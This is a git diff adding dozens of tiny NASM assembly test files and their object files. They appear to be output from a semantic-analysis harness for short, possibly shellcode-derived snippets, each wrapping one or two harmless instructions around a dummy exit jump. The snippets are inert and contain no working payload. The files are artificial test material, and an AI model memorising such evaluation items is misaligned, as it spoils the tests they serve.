my_start + +my_start: + + jmp short setup + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_385.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_385.obj new file mode 100644 index 0000000000000000000000000000000000000000..f93952f18aad3e415f4c1f774c2026b37fcd99a7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_385.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_394.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_394.asm new file mode 100644 index 0000000000000000000000000000000000000000..96b6cd9316f95c8c18d432ca0193f6c64c68c3a9 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_394.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + zero1e: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_394.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_394.obj new file mode 100644 index 0000000000000000000000000000000000000000..84913f65c60e3f02f02559a9dfed72d200ab27a9 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_394.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_395.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_395.asm new file mode 100644 index 0000000000000000000000000000000000000000..dc01f6d3617f3a7f8f86df55dd95e2237f306a71 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_395.asm @@ -0,0 +1,11 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_395.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_395.obj new file mode 100644 index 0000000000000000000000000000000000000000..ccb8cf272c9942ed5efccc4becf0965fb82626f2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_395.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_398.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_398.asm new file mode 100644 index 0000000000000000000000000000000000000000..e055f98132e57f770d94380a2c1a0ede6b64912c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_398.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor ecx, ecx + mul ecx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_398.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_398.obj new file mode 100644 index 0000000000000000000000000000000000000000..bdcba09bf7a78726cfdee9b13424d59b51dc2c31 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_398.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_40.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_40.asm new file mode 100644 index 0000000000000000000000000000000000000000..dc01f6d3617f3a7f8f86df55dd95e2237f306a71 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_40.asm @@ -0,0 +1,11 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_40.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_40.obj new file mode 100644 index 0000000000000000000000000000000000000000..c75144a7e0595b43738066e2f8a770e837141b76 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_40.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_400.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_400.asm new file mode 100644 index 0000000000000000000000000000000000000000..404a06dde1b6706aab6841e4007037006afd93df --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_400.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mul ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_400.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_400.obj new file mode 100644 index 0000000000000000000000000000000000000000..f56f700376563570fe600724c6963fb73da599b2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_400.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_402.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_402.asm new file mode 100644 index 0000000000000000000000000000000000000000..32ea0aee11c64d598f58d3c7689452178bf75a93 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_402.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + inc cl + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_402.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_402.obj new file mode 100644 index 0000000000000000000000000000000000000000..15fa4bcd8e517dcfa49964e0bcc764af1dbb6292 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_402.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_410.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_410.asm new file mode 100644 index 0000000000000000000000000000000000000000..111738449b3549d971eddf913c765e1f67afd27f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_410.asm @@ -0,0 +1,14 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push ebx + push ebx + push esi + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_410.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_410.obj new file mode 100644 index 0000000000000000000000000000000000000000..f5e307b4ab69f6f9167874af4b6c3909da611699 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_410.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_411.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_411.asm new file mode 100644 index 0000000000000000000000000000000000000000..368a2dec4f870f77d401d0b61389c58a9e8d462e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_411.asm @@ -0,0 +1,14 @@ +section .data + +checkforfile equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + test eax, eax + jnz checkforfile + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_411.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_411.obj new file mode 100644 index 0000000000000000000000000000000000000000..34fc62055ffaf302c9925a4139fdc5f130e639e1 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_411.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_413.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_413.asm new file mode 100644 index 0000000000000000000000000000000000000000..a04d975c98cb9a70195400c2139b7c06bed42d1a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_413.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov cl,0x2 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_413.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_413.obj new file mode 100644 index 0000000000000000000000000000000000000000..c1e7d3e367309747f5a0f7fd3eeb6a5e8e4af6d3 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_413.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_414.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_414.asm new file mode 100644 index 0000000000000000000000000000000000000000..034acf1e0a16c16052788894730229bc16868039 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_414.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + rol edx, 0x4 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_414.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_414.obj new file mode 100644 index 0000000000000000000000000000000000000000..edf871d228648d0fa9e47ad77d4dd054e9c32e8b Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_414.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_416.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_416.asm new file mode 100644 index 0000000000000000000000000000000000000000..bfdb4c28cb6264d3d6848b6c0235e12e5e6b5560 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_416.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov edi, edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_416.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_416.obj new file mode 100644 index 0000000000000000000000000000000000000000..5b340a0dfde7031bb8c3344e423f40662d44542f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_416.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_417.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_417.asm new file mode 100644 index 0000000000000000000000000000000000000000..27fa8fbdda601d729f4d3e7299069be8b3d6f546 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_417.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor ebx,eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_417.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_417.obj new file mode 100644 index 0000000000000000000000000000000000000000..0d878f4a5b59ebeb954b5c97272399134d002e59 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_417.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_422.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_422.asm new file mode 100644 index 0000000000000000000000000000000000000000..9b5dabc42940731669cd7c1cee35bf156d62d003 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_422.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + lea edi, [esi +1] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_422.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_422.obj new file mode 100644 index 0000000000000000000000000000000000000000..9df265198acea1e2282f26154d390b1cbb5702e0 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_422.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_425.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_425.asm new file mode 100644 index 0000000000000000000000000000000000000000..2da651a34bffe2c8a80188fccf5692efb7adf50e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_425.asm @@ -0,0 +1,14 @@ +section .data + +function_1 equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + F2: + call function_1 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_425.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_425.obj new file mode 100644 index 0000000000000000000000000000000000000000..a8c94275e896511e0dcb94cc475adbb976465eae Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_425.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_428.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_428.asm new file mode 100644 index 0000000000000000000000000000000000000000..dc01f6d3617f3a7f8f86df55dd95e2237f306a71 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_428.asm @@ -0,0 +1,11 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_428.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_428.obj new file mode 100644 index 0000000000000000000000000000000000000000..21e93f34ef346517385d9f59eb7319d563b95beb Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_428.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_431.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_431.asm new file mode 100644 index 0000000000000000000000000000000000000000..779bf4a3c86be7f313ac734756091ab005ae4ac9 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_431.asm @@ -0,0 +1,14 @@ +section .data + +all equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp eax, ebx + je all + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_431.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_431.obj new file mode 100644 index 0000000000000000000000000000000000000000..c953a640f8f607ad0a8a889ce396f1953aa42d5f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_431.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_436.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_436.asm new file mode 100644 index 0000000000000000000000000000000000000000..b69647d7181aeb517c7b69362daf6d967b53df78 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_436.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + scasd + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_436.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_436.obj new file mode 100644 index 0000000000000000000000000000000000000000..b9bd8301442c85865b6c8ac5166087304524bfc1 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_436.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_44.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_44.asm new file mode 100644 index 0000000000000000000000000000000000000000..9cd030a790167c958cf59ef679c7fa005e38c309 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_44.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_44.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_44.obj new file mode 100644 index 0000000000000000000000000000000000000000..e12396ee2ccb090270d820d468965ef44fce480b Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_44.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_442.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_442.asm new file mode 100644 index 0000000000000000000000000000000000000000..095554462417851ac187976e8babfc9eb14d8e84 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_442.asm @@ -0,0 +1,15 @@ +section .data + +write equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + test eax, eax + jz write + xor eax, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_442.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_442.obj new file mode 100644 index 0000000000000000000000000000000000000000..36751ce5f7bd6837d41d14ea032943262d2c33c7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_442.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_445.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_445.asm new file mode 100644 index 0000000000000000000000000000000000000000..34ac46a3e126e839fa53143549e9819ea7b05004 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_445.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + inc ebx + push ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_445.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_445.obj new file mode 100644 index 0000000000000000000000000000000000000000..164e84fb60b6a8bb68818ddcf8d7d5340067ba56 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_445.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_446.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_446.asm new file mode 100644 index 0000000000000000000000000000000000000000..a1df3298210aadb36ea5408448279ea11ab3dae7 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_446.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + word1 word 65535 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_448.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_448.asm new file mode 100644 index 0000000000000000000000000000000000000000..8eb2c6096e869a27365dfb429d26c641ce1231d5 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_448.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ebx, 4 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_448.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_448.obj new file mode 100644 index 0000000000000000000000000000000000000000..8d9c832327ff1fd4e49fecaf94bf6336e92975d9 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_448.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_452.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_452.asm new file mode 100644 index 0000000000000000000000000000000000000000..15c59317a85bccab1609e486c22debf5b909998f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_452.asm @@ -0,0 +1,14 @@ +section .data + +_while_loop equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + test eax, eax + js _while_loop + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_452.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_452.obj new file mode 100644 index 0000000000000000000000000000000000000000..2ecff9eea64e5fc7705d927a4eb57174e1882b58 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_452.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_455.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_455.asm new file mode 100644 index 0000000000000000000000000000000000000000..d454c5ffc1e2842d96211e6a6e631f5be1fb02ef --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_455.asm @@ -0,0 +1,13 @@ +section .data + +encodedshellcode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jne encodedshellcode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_455.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_455.obj new file mode 100644 index 0000000000000000000000000000000000000000..454c5d1d3eb20777a30ef8438736a814412a11d0 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_455.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_457.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_457.asm new file mode 100644 index 0000000000000000000000000000000000000000..7aa64e148908778a42214679f9c05d4ff73ba197 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_457.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_457.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_457.obj new file mode 100644 index 0000000000000000000000000000000000000000..ec3ae08fbfb679dc161444e1c407783e5b26439f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_457.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_458.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_458.asm new file mode 100644 index 0000000000000000000000000000000000000000..b542aaa86e7ee5ffc99a80a0152c1669e14a2f77 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_458.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cld + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_458.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_458.obj new file mode 100644 index 0000000000000000000000000000000000000000..87589dae60e24ef1ca2ec276bb4bbd4ece7c08ab Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_458.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_46.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_46.asm new file mode 100644 index 0000000000000000000000000000000000000000..75a3371b81ad5cfd4ace5990a506cb9bbce17f8d --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_46.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + next_addr: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_46.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_46.obj new file mode 100644 index 0000000000000000000000000000000000000000..981dae42ff2cbdce1163b3a36177299ff3ac44ea Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_46.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_461.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_461.asm new file mode 100644 index 0000000000000000000000000000000000000000..7189f0f04257d990521677e1e514e310dccb520f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_461.asm @@ -0,0 +1,14 @@ +section .data + +_start equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp al, 0xf2 + jz _start + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_461.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_461.obj new file mode 100644 index 0000000000000000000000000000000000000000..84142cb5eff0994306e6dc63b9b55e8943d8cc8f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_461.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_467.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_467.asm new file mode 100644 index 0000000000000000000000000000000000000000..ccf515815c3ad614ee53d2d305ed7a079c642e16 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_467.asm @@ -0,0 +1,14 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp cl, 0x11 + jb 0xff + add dl, 0x5 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_467.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_467.obj new file mode 100644 index 0000000000000000000000000000000000000000..71297c6706351f46d2fda0898b81b900ef018c4e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE 